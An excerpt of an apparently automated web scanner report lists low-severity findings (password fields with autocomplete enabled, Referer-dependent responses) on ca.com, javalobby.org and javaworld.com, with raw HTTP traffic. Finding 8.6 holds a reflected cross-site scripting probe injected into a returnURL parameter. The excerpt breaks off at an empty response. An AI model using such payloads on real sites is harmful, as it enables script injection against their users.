GET /us/register/login.aspx?returnURL=/us/default.aspx HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: http://www.ca.com/us/default.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351389192:ss=1315351389192; bn_u=6923713924586392201
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:48 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 18:23:48 GMT Content-Length: 35650 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <meta htt...[SNIP]... <body onload="getFocus();"> <form name="mainForm" method="post" action="/us/register/login.aspx?returnURL=/us/default.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm"> <div>...[SNIP]... <div class="formitemfield"> <input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" /> <div class="formtip2 blue small">...[SNIP]...
8.4. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The page contains a form with the following action URL:https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 The form contains the following password field with autocomplete enabled:
Request
GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: http://www.ca.com/us/default.aspx User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351414553:ss=1315351389192; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:23:42 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 18:23:42 GMT Content-Length: 36056 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <meta htt...[SNIP]... <body onload="getFocus();"> <form name="mainForm" method="post" action="/us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm"> <div>...[SNIP]... <div class="formitemfield"> <input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" /> <div class="formtip2 blue small">...[SNIP]...
8.5. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The page contains a form with the following action URL:https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3freturnURL%3dL3VzL2RlZmF1bHQuYXNweA%3d%3d The form contains the following password field with autocomplete enabled:
Request
GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3freturnURL%3dL3VzL2RlZmF1bHQuYXNweA%3d%3d HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: https://www.ca.com/us/register/login.aspx?returnURL=/us/default.aspx Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351628610:ss=1315351389192; target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3freturnURL=L3VzL2RlZmF1bHQuYXNweA==; SMTRYNO=1
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:27:11 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 18:27:11 GMT Content-Length: 36262 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <meta htt...[SNIP]... <body onload="getFocus();"> <form name="mainForm" method="post" action="/us/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3freturnURL%3dL3VzL2RlZmF1bHQuYXNweA%3d%3d" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm"> <div>...[SNIP]... <div class="formitemfield"> <input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" /> <div class="formtip2 blue small">...[SNIP]...
8.6. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The page contains a form with the following action URL:https://www.ca.com/us/register/login.aspx?returnURL=/us/default.aspx%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Exss The form contains the following password field with autocomplete enabled:
Request
GET /us/register/login.aspx?returnURL=/us/default.aspx%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Exss HTTP/1.1 Host: www.ca.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Cookie: WT_FPC=id=22cc2d847a5ef580ca31315351916776:lv=1315351916776:ss=1315351916776
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:35:49 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 18:35:48 GMT Content-Length: 36023 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <meta htt...[SNIP]... <body onload="getFocus();"> <form name="mainForm" method="post" action="/us/register/login.aspx?returnURL=/us/default.aspx%22%3E%3Cscript%3Eprompt(document.location)%3C/script%3Exss" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm"> <div>...[SNIP]... <div class="formitemfield"> <input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" /> <div class="formtip2 blue small">...[SNIP]...
8.7. https://www.ca.com/us/register/login.aspx
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
https://www.ca.com
Path:
/us/register/login.aspx
Issue detail
The page contains a form with the following action URL:https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d The form contains the following password field with autocomplete enabled:
Request
GET /us/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d HTTP/1.1 Host: www.ca.com Connection: keep-alive Referer: https://www.ca.com/us/register/login.aspx?TYPE=33554433&REALMOID=06-87393857-93f3-4215-801a-7f71d6dfdcde&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=rs-prod-communities-wa&TARGET=-SM-HTTPS%3a%2f%2fcommunities%2eca%2ecom%2fc%2fportal%2flogin%3fp_l_id%3d10141 Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351598983:ss=1315351389192; target=https%3a//www.ca.com/register/ssoauthenticate.aspx%3fCATARGET=LVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ==; SMTRYNO=1
Response
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: SMTRYNO=false; domain=ca.com; expires=Tue, 06-Sep-2011 18:26:55 GMT; path=/ X-Powered-By: ASP.NET Date: Tue, 06 Sep 2011 18:26:55 GMT Content-Length: 36448 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"> <meta htt...[SNIP]... <body onload="getFocus();"> <form name="mainForm" method="post" action="/us/register/login.aspx?TYPE=33554433&REALMOID=06-1b8e166c-7b99-4dde-8e8e-3d72b8676926&GUID=0&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=-SM-ceh3eHBrhdBGtkDbzVMc19jsrO5glB4Pb5vXNZLDdm9J8L7U83j3tj9%2bMS6GITKt&TARGET=-SM-https%3a%2f%2fwww%2eca%2ecom%2fregister%2fssoauthenticate%2easpx%3fCATARGET%3dLVNNLUhUVFBTOi8vY29tbXVuaXRpZXMuY2EuY29tL2MvcG9ydGFsL2xvZ2luP3BfbF9pZD0xMDE0MQ%3d%3d" onsubmit="javascript:return WebForm_OnSubmit();" id="mainForm"> <div>...[SNIP]... <div class="formitemfield"> <input name="PASSWORD" type="password" id="PASSWORD" class="small hastip formfieldwidth2" /> <div class="formtip2 blue small">...[SNIP]...
8.8. http://www.javalobby.org/articles/acegisecurity/part1.jsp
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.javalobby.org
Path:
/articles/acegisecurity/part1.jsp
Issue detail
The page contains a form with the following action URL:http://www.javalobby.org/forums/login.jspa The form contains the following password field with autocomplete enabled:
Request
GET /articles/acegisecurity/part1.jsp HTTP/1.1 Host: www.javalobby.org Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Resin/3.2.1 Content-Type: text/html; charset=ISO-8859-1 Date: Tue, 06 Sep 2011 17:55:34 GMT Content-Length: 33566 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title>Securing Your Java Applications - Acegi Security Style</title> <meta http-equiv="content-type"...[SNIP]... <div class="welcomebar"> <form action="/forums/login.jspa" method="post" name="loginform"> Username/Email: <input type="text" name="username" size="20" maxlength="150" value="" tabindex="1" id="username01" /> Password: <input type="password" name="password" size="20" maxlength="150" value="" tabindex="2" id="password01" /> <input type="hidden" name="autoLogin" id="autoLogin01" value="true" />...[SNIP]...
8.9. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
previous
next
Summary
Severity:
Low
Confidence:
Certain
Host:
http://www.javaworld.com
Path:
/javaworld/jw-10-2007/jw-10-acegi2.html
Issue detail
The page contains a form with the following action URL:http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html The form contains the following password field with autocomplete enabled:
Request
GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1 Host: www.javaworld.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:45:52 GMT Server: Apache/2.2.3 (CentOS) Accept-Ranges: bytes Cache-Control: public, max-age=600 Cneonction: close Content-Type: text/html; charset=UTF-8 Content-Length: 67949 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/h...[SNIP]... <div id="login" name="login" method="post" action="/community/rtn_login08.php"> <form id="form_login"> <fieldset>...[SNIP]... <td> <input name="upass" type="password" id="jq_password" class="inputtext" /> </td>...[SNIP]...
9. Referer-dependent response
previous
next
There are 3 instances of this issue:
Issue description
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present. Common explanations for Referer-dependent responses include:Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function. Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques. Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing. If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.
9.1. http://www.javaworld.com/javaworld/jw-10-2007/jw-10-acegi2.html
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.javaworld.com
Path:
/javaworld/jw-10-2007/jw-10-acegi2.html
Request 1
GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1 Host: www.javaworld.com Proxy-Connection: keep-aliveReferer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:45:52 GMT Server: Apache/2.2.3 (CentOS) Accept-Ranges: bytes Cache-Control: public, max-age=600 Cneonction: close Content-Type: text/html; charset=UTF-8 Content-Length: 67949 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/h...[SNIP]... <script language="javascript"> var outerref = new String("http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=acegisecurity"); var nwchannel = 'jw'; var refresh = 0; var jq_rxid = '115812'; </script> <base target = "_top"> <script type="text/javascript" src="/includes/head-scripts.js"></script> <script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script> <script type="text/javascript"> NW = window.NW || {}; NW.PageInfo = NW.PageInfo || {}; NW.PageInfo = function() { return{ cookie_domain: "javaworld.com", rxprimarytopic: "enterprise", rxheadline: "Acegi Security in one hour", channels: "jw", request_uri: "/javaworld/jw-10-2007/jw-10-acegi2.html", doc_uri: "/javaworld/jw-10-2007/jw-10-acegi2.html", rxid: "115812", nodeid: "", pgtype: "article", // use this function to return meta info and add to NW.PageInfo object setMetaInfo: function() { $("meta").each(function (i) { var n = $(this).attr("name"); var c = $(this).attr("content") //alert('before - ' + n + ": " + c); if(n && c) { NW.PageInfo[n] = $(this).attr("content"); //document.write('in - ' + n + ": " + c + '<br />'); } }); } }; }(); NW.PageInfo.setMetaInfo(); </script> <!-- HBX --> <script language="javascript1.1"> var _hbEC=0,_hbE=new Array;function _hbEvent(a,b){b=_hbE[_hbEC++]=new Object();b._N=a;b._C=0;return b;} var hbx=_hbEvent("pv");hbx.vpc="HBX0103u";hbx.gn="a.javaworld.com"; var doctitle = hbxStrip(document.title); var loc = new String(document.location.href); loc = hbxStrip(loc); hbx.acct="DM54120129AB;DM550210NGWB"; hbx.pn="PUT+PAGE+NAME+HERE"; hbx.mlc="CONTENT+CATEGORY"; hbx.pndef="title"; hbx.ctdef="full"; hbx.lvm="300"; hbx.lidt="txl"; hbx.fv="";//FORM VAL MIN hbx.lt="auto"; //LINK TR hbx.dlf="n";//Dl FILTER hbx.dft="n";//Dl FILE NAMING hbx.elf="n";//E...[SNIP]...
Request 2
GET /javaworld/jw-10-2007/jw-10-acegi2.html HTTP/1.1 Host: www.javaworld.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:45:58 GMT Server: Apache/2.2.3 (CentOS) Accept-Ranges: bytes Cache-Control: public, max-age=600 Cneonction: close Content-Type: text/html; charset=UTF-8 Content-Length: 67878 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/h...[SNIP]... <script language="javascript"> var outerref = new String("(none)"); var nwchannel = 'jw'; var refresh = 0; var jq_rxid = '115812'; </script> <base target = "_top"> <script type="text/javascript" src="/includes/head-scripts.js"></script> <script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script> <script type="text/javascript"> NW = window.NW || {}; NW.PageInfo = NW.PageInfo || {}; NW.PageInfo = function() { return{ cookie_domain: "javaworld.com", rxprimarytopic: "enterprise", rxheadline: "Acegi Security in one hour", channels: "jw", request_uri: "/javaworld/jw-10-2007/jw-10-acegi2.html", doc_uri: "/javaworld/jw-10-2007/jw-10-acegi2.html", rxid: "115812", nodeid: "", pgtype: "article", // use this function to return meta info and add to NW.PageInfo object setMetaInfo: function() { $("meta").each(function (i) { var n = $(this).attr("name"); var c = $(this).attr("content") //alert('before - ' + n + ": " + c); if(n && c) { NW.PageInfo[n] = $(this).attr("content"); //document.write('in - ' + n + ": " + c + '<br />'); } }); } }; }(); NW.PageInfo.setMetaInfo(); </script> <!-- HBX --> <script language="javascript1.1"> var _hbEC=0,_hbE=new Array;function _hbEvent(a,b){b=_hbE[_hbEC++]=new Object();b._N=a;b._C=0;return b;} var hbx=_hbEvent("pv");hbx.vpc="HBX0103u";hbx.gn="a.javaworld.com"; var doctitle = hbxStrip(document.title); var loc = new String(document.location.href); loc = hbxStrip(loc); hbx.acct="DM54120129AB;DM550210NGWB"; hbx.pn="PUT+PAGE+NAME+HERE"; hbx.mlc="CONTENT+CATEGORY"; hbx.pndef="title"; hbx.ctdef="full"; hbx.lvm="300"; hbx.lidt="txl"; hbx.fv="";//FORM VAL MIN hbx.lt="auto"; //LINK TR hbx.dlf="n";//Dl FILTER hbx.dft="n";//Dl FILE NAMING hbx.elf="n";//EXIT LINK FILTER hbx.seg="-1"; hbx.ci=""; hbx.hc1="enterprise|"; hbx.hc...[SNIP]...
9.2. http://www.viddler.com/embed/dca1712/
previous
next
Summary
Severity:
Information
Confidence:
Firm
Host:
http://www.viddler.com
Path:
/embed/dca1712/
Request 1
GET /embed/dca1712/?f=1&offset=0&autoplay=0&disablebranding=0 HTTP/1.1 Host: www.viddler.com Proxy-Connection: keep-aliveReferer: http://blog.proofpoint.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
